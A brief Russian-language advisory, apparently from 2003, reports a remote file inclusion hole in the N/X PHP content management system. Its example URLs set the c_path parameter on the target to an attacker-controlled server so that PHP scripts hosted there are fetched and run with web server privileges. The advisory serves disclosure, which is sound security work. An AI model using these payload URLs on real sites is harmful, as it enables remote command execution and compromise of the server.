Выполнение произвольных команд в N/X

Дата публикации:
05.01.2003
Всего просмотров:
848
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: N/X – система управления Web контентом, написанная на PHP. Требует MySQL и php4. Обнаруженная уязвимость позволяет удаленному атакующему включать произвольные файлы, расположенные на удаленном сервере. Если удаленный файл - PHP сценарий, то атакующий может выполнять произвольные команды с привилегиями Web сервера. Пример:
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ 
with :
http://[attacker]/common/lib/launch.inc.php


http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ 
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
Уязвимость обнаружена в N/X 2002 PreRelease 1

Ссылки: N/X (PHP)
или введите имя

CAPTCHA